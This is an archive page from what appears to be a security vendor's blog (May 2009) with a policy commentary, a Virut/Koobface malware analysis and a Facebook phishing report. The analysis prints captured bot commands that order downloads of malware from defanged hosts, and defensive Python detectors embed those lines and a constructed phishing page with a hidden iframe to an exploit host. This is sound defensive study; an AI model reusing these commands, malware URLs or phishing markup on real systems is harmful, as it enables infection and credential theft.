Archive for May, 2009

Cyberspace Policy Review

Friday, May 29th, 2009

If you’re looking for the 60-page cybersecurity policy review that President Barack Obama discussed this morning, you can find it here.

Considering that Aleph One’s article “Smashing the Stack for Fun and Profit” was released in 1996, ILOVEYOU hit in 2000, Code Red in 2001, the Slammer worm in 2003, the Witty worm in 2004, and the thousands of system intrusions and compromises (reported and unreported) since, and the list goes on, the review seems around fifteen years late on delivery. But better late than never. It addresses badly needed subjects and planning in thoughtful and creative ways.

Some of the document is predictably clumsy. Chapter IV, “Creating Effective Information Sharing and Incident Response”, oddly opens with Downadup/Conficker as its current example and impetus for action: “For example, despite advance warning and instructions on how networks could be protected, had the ‘Conficker [Downadup]’ worm activated on April 1, 2009 with a malicious payload, some federal departments and agencies were not prepared to respond”. What malicious payload? Unprepared in what way? For infected machines within the federal and state governments? For a DDoS attack from the majority of Downadup-infected systems, which were actually across the ocean (and most of which just wound up with a FakeAV download)? Don’t leave me hanging, folks: what were they unprepared for?

Of note, some of the law enforcement agencies in attendance at the presentation have field offices with agents who don’t know what a URL is (which is much like reporting something to a police officer and hearing them respond “Sorry, I don’t know what a street address is, please tell someone else”). Given that level of techno-savvy, the section on cyber-education, “Building Capacity for a Digital Nation”, is much needed, overdue, and significant.

It’s a good read, especially the section addressing internationally co-ordinated efforts, “Partner Effectively With the International Community”.

Cheers to open dialog about cyber-security challenges!

Virut Distributing Koobface, Ad-Clickers and Spambots

Tuesday, May 26th, 2009

Virut is a nasty file infector that has been actively updated and distributed for a few years. Yes, you read that correctly: actively updated and distributed for a few years now. A system infected with this stuff often needs to be wiped and reinstalled altogether. ThreatFire has been doing its part (for the past couple of years) to block the new variants on users’ systems even when the traditional AV scanners have failed to keep up.

Are viruses the thing of yesteryear? Not at all. Is it another 29A, another group of kids looking for some thrills and recognition of their virus writing skills? No. What we find is that the hosting server, the downloads, and the multiple layers of effort are well orchestrated and financially motivated.

The family uses all sorts of tricks to distribute itself and many other components. Much has already been written on its changing infection, encryption, memory residence, injection, HTML file appending, and hooking techniques. But what is the group behind it up to now?
This summary puts together a few more key points on the threat’s current activity and its hosts. The threat itself comes from a number of servers and delivers a variety of malware. We’ll see that it is responsible for far more than infected files and IRC traffic, including adware, rootkits, password stealers, worms and spambots.

Virut’s current strain of executable infector is highly prevalent. Over the past couple of months the ThreatFire community has blocked tens of thousands of infection attempts by a couple of the newest Virut variants. The executable infector is redeveloped quickly and often, and has been known to be buggy: infected files are sometimes damaged in ways the major AV vendors’ disinfection routines cannot undo, so cleaning a detected file may leave it corrupted.

The first server that the current active Virut variant connects to is, oddly enough, reached over TCP port 80, but the session is IRC, not HTTP. Putting the command channel on the web port lets it through egress filters that only allow outbound web traffic and lets it blend in with browsing. The bot joins one of the channels there and receives private messages instructing it to download more malware:

NICK xxx
USER xxx. . :#xxx Service Pack 3

:u. PRIVMSG xxx:!get hxxp://cock.8866. org:88/files/adx.gif (Spyware downloader)
:u. PRIVMSG xxx:!get hxxp://dl.guarddog2009. com/cw.exe (Koobface variant)
:u. PRIVMSG xxx:!get hxxp://goasi. cn/ex/a.php (serves “load.exe” malicious downloader)
:u. PRIVMSG xxx:!get hxxp://85.114.131. 69/ad2.exe (malicious ad-popper)
PING :l.
PONG :l.
PING :l.
PONG :l.

Of those domains, it is interesting that the “” is actively serving Koobface worm variants and ad-poppers, considering that scareware/rogueware is being peddled from the same IP. Avoid it:

Once running, these additional pieces of malware download other nastiness in the background:
hxxp://avhtm.8866. org/files/av.htm (spambot dropper)
a POST is sent to main15052009. com/achcheck.php
hxxp://74.52.164. 210/pk/bb021908.exe (malicious downloader)

another POST is sent up to main15052009. com/ld/gen.php, with a recognizable Koobface response:
START|hxxp://www.i-site. ph/1/6244.exe (Bho dropper)
START|hxxp://www.i-site. ph/1/nfr.exe (proxy component)

hxxp://ji-u. cn/506.exe <-- hxxp://goasi. cn/dll/abb.txt (renamed to reader_s.exe and run, an updated Virut backdoor variant)

An unusual user-agent rears its head:
GET /ad2.exe HTTP/1.0 (malicious ad-popper listed above)
User-Agent: Download
Pragma: no-cache
(Incidentally, is the host to s2.zief. pl and dl.guarddog2009. com.)
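The IRC-over-port-80 session above and the bare “Download” User-Agent are both things a network sensor can key on without knowing any of the domains. The script below is an added example (not ThreatFire’s code): it classifies a tcp/80 payload as HTTP or IRC by its first line, pulls the “!get” download orders out of IRC PRIVMSGs, pulls the “START|” task list out of the Koobface reply to gen.php, and flags the odd User-Agent. The three captures embedded in it are constructed from the lines quoted in this post (annotations removed, hxxp/space defanging kept); the hostnames are never resolved or fetched.

```python
"""Triage a tcp/80 payload for the Virut behaviour in this post: an IRC
session on the HTTP port, "!get <url>" download orders arriving as PRIVMSGs,
the Koobface "START|<url>" task list, and the bare "Download" User-Agent.

Added example, not ThreatFire's code. The captures below are constructed
from the lines quoted in the post; nothing is resolved or fetched.
"""
import re

HTTP_METHODS = ("GET ", "POST ", "HEAD ", "PUT ", "OPTIONS ", "CONNECT ")
# An IRC line from either side, with or without a ":prefix" (e.g. ":u. PRIVMSG ...")
IRC_LINE = re.compile(r"^(?::\S+\s+)?(NICK|USER|PRIVMSG|JOIN|PING|PONG)\b", re.I)
# The bot's download order. The URL is the whole trailing parameter, so the
# defanging space inside a host ("goasi. cn") must be kept in the match.
IRC_GET = re.compile(r"!get\s+(.+?)\s*$", re.I)
KOOBFACE_TASK = re.compile(r"^START\|(.+?)\s*$")
# User-Agents no browser or legitimate updater sends; "Download" fetched ad2.exe
SUSPECT_UA = {"download"}


def refang(url):
    """'hxxp://goasi. cn/ex/a.php' -> 'http://goasi.cn/ex/a.php' for IOC matching."""
    return re.sub(r"^hxxp", "http", url.replace(". ", "."), flags=re.I)


def classify_flow(payload):
    """Label a payload seen on tcp/80 by its first line: http, irc or unknown."""
    lines = payload.strip().splitlines()
    first = lines[0].strip() if lines else ""
    if first.startswith(HTTP_METHODS):
        return "http"
    if IRC_LINE.match(first):
        return "irc"
    return "unknown"


def triage(payload, dst_port=80):
    """Return a list of (finding, detail) pairs for one client<->server payload."""
    proto = classify_flow(payload)
    findings = []
    if proto == "irc" and dst_port == 80:
        # IRC on the web port: protocol/port mismatch is the durable signal,
        # it survives the operators rotating domains and IPs.
        findings.append(("irc-on-80", payload.strip().splitlines()[0].strip()))
    for raw in payload.splitlines():
        line = raw.strip()
        if proto == "irc":
            m = IRC_GET.search(line)
            if m:
                findings.append(("irc-get", refang(m.group(1))))
        elif proto == "http" and line.lower().startswith("user-agent:"):
            ua = line.split(":", 1)[1].strip()
            if ua.lower() in SUSPECT_UA:
                findings.append(("odd-ua", ua))
        m = KOOBFACE_TASK.match(line)  # task list in the gen.php response body
        if m:
            findings.append(("koobface-task", refang(m.group(1))))
    return findings


# Constructed from the post's IRC capture (both directions, annotations removed)
IRC_SESSION = """NICK xxx
USER xxx . . :#xxx Service Pack 3
:u. PRIVMSG xxx :!get hxxp://cock.8866. org:88/files/adx.gif
:u. PRIVMSG xxx :!get hxxp://dl.guarddog2009. com/cw.exe
:u. PRIVMSG xxx :!get hxxp://goasi. cn/ex/a.php
:u. PRIVMSG xxx :!get hxxp://85.114.131. 69/ad2.exe
PING :l.
PONG :l.
"""

# Constructed from the post's ad2.exe fetch
AD_POPPER_FETCH = "GET /ad2.exe HTTP/1.0\r\nUser-Agent: Download\r\nPragma: no-cache\r\n\r\n"

# Constructed: the POST to gen.php and the Koobface reply, concatenated as one flow
KOOBFACE_REPLY = """POST /ld/gen.php HTTP/1.1
Host: main15052009. com

HTTP/1.1 200 OK

START|hxxp://www.i-site. ph/1/6244.exe
START|hxxp://www.i-site. ph/1/nfr.exe
"""

if __name__ == "__main__":
    for name, flow in (("irc", IRC_SESSION), ("ad2", AD_POPPER_FETCH), ("koobface", KOOBFACE_REPLY)):
        for finding in triage(flow):
            print(name, *finding)
```

The protocol check comes first on purpose: the domains in this post will be gone in weeks, but a bot that speaks IRC to port 80 or fetches executables with a User-Agent of “Download” looks the same on the wire after the next hosting move.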

Additional files downloaded:
hxxp://ipkipk.3322. org/ipk.exe (downloader/adclick component)
hxxp://xz.wanggui. com/mem322.exe (downloader for password stealers)
hxxp://www.dofulfill . net/loadersvc.exe

All the while, in the background, the infected machine sends phantom requests to multiple servers, simulating clicks to inflate traffic at various sites, including job sites.

And then comes the spam. Infected machines spew spam containing messages like
“If you don’t feel like a complete person because you can’t afford luxury things to look stylish and elegant, you can forget about this feeling. We offer you fantastic deals on fantastic watches.”
A link is included that takes you to a “group” at a major provider, where knockoff watches and bags appear to be for sale. A click on an image redirects the user to sites like “trylamp. com”. Often, other pieces of spam carry offers for pills of all kinds.

Facebook Phish

Thursday, May 21st, 2009

While no product protects against absolutely everything, a couple of technical support people here received Facebook messages, sent from their friends’ accounts, telling them to check out “Brunga. at”. (Do not visit this site right now or fill out login information there; it will steal your credentials.)

Subject: Dan Shmoo sent you a message on Facebook…
Dan sent you a message.

Subject: Hello

Screenshot of the site (notice the blue banner missing the Facebook logo):

After the user fills in authentication details, which are stolen, the page redirects to the real Facebook site, so nothing looks wrong.
Use your head and always check the site’s URL before entering authentication/login info. Be careful of phishing attacks.

Sorry, folks, ThreatFire doesn’t protect you from phishing attempts like this one: it wasn’t designed to stop phishing, and nothing at the software behavioral level looks malicious here. The times that we visited the active site, there was no malware delivered from brunga. However, there was an iframe at the bottom of the page redirecting the browser to a site that has been known to deliver LuckySploit exploit pages (updateserver. com, another site to avoid for now). Any successful LuckySploit attack is bound to deliver a barrage of malware, recently including the banking password-stealer Zbot, sophisticated spambots like Rustock, and various custom-made keyloggers. This specific server is busy and malicious, and it has been involved in poisoning too. On a daily basis, ThreatFire is preventing these malformed-PDF based LuckySploit attacks in high numbers.
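The two things that made this page dangerous, a password form on a host that is not Facebook and an iframe at the bottom pulling from the exploit host, can both be spotted statically in the saved HTML. The script below is an added example (not ThreatFire’s or Facebook’s code) that audits a saved page for exactly those two traits. The HTML in it is constructed for the example: the two hosts are the ones named in this post, while the paths, field names and iframe attributes are invented, and nothing is fetched.

```python
"""Static audit of a saved login page for the two traits described in the post:
a password form that does not submit to the brand it imitates, and an <iframe>
that loads content from a different (exploit-kit) host.

Added example, not ThreatFire's or Facebook's code. The HTML below is
constructed: the hosts are the two named in the post, the paths and field
names are invented, and nothing is fetched.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


def same_site(host, site):
    """True if host is site itself or a subdomain of it (not 'site.evil.example')."""
    return host is not None and (host == site or host.endswith("." + site))


class LoginPageAudit(HTMLParser):
    def __init__(self, page_url, brand_site):
        super().__init__()
        self.page_url = page_url
        self.page_host = urlparse(page_url).hostname
        self.brand_site = brand_site
        self.form = None        # state of the <form> currently open
        self.findings = []      # (kind, url) pairs

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            # resolve a relative action against the page URL, as the browser would
            self.form = {"action": urljoin(self.page_url, a.get("action", "")),
                         "password": False}
        elif tag == "input" and self.form is not None:
            if a.get("type", "text").lower() == "password":
                self.form["password"] = True
        elif tag == "iframe":
            src = urljoin(self.page_url, a.get("src", ""))
            host = urlparse(src).hostname
            style = a.get("style", "").replace(" ", "").lower()
            hidden = ("display:none" in style or "visibility:hidden" in style
                      or a.get("width", "") in ("0", "1")
                      or a.get("height", "") in ("0", "1"))
            if host and host != self.page_host:
                kind = "hidden-offsite-iframe" if hidden else "offsite-iframe"
                self.findings.append((kind, src))

    def handle_endtag(self, tag):
        if tag == "form" and self.form is not None:
            if self.form["password"]:
                action_host = urlparse(self.form["action"]).hostname
                # a Facebook-branded login that posts anywhere but facebook.com
                if not same_site(action_host, self.brand_site):
                    self.findings.append(("credential-form-offbrand", self.form["action"]))
            self.form = None


def audit_login_page(page_url, html, brand_site="facebook.com"):
    """Return the (kind, url) findings for a saved page claiming to be brand_site."""
    p = LoginPageAudit(page_url, brand_site)
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: a Facebook look-alike on brunga.at with the iframe at the
# bottom pointing at updateserver.com, as the post describes (paths invented).
PHISH_HTML = """<html><head><title>Facebook | Login</title></head><body>
<div class="banner"></div>
<form method="post" action="/login.php">
  <input type="text" name="email"><input type="password" name="pass">
  <input type="submit" value="Login">
</form>
<iframe src="http://updateserver.com/in.php" width="1" height="1" style="display:none"></iframe>
</body></html>"""

# Constructed contrast case: a login form that posts to the brand's own site
LEGIT_HTML = """<html><body><form method="post" action="https://login.facebook.com/login.php">
<input type="text" name="email"><input type="password" name="pass"></form></body></html>"""

if __name__ == "__main__":
    for kind, url in audit_login_page("http://brunga.at/index.php", PHISH_HTML):
        print(kind, url)
```

The brand check is what the “look at the URL” advice above amounts to in code, and the iframe check catches what this particular page actually carried: a credential phish and a silent hand-off to an exploit server on the same visit.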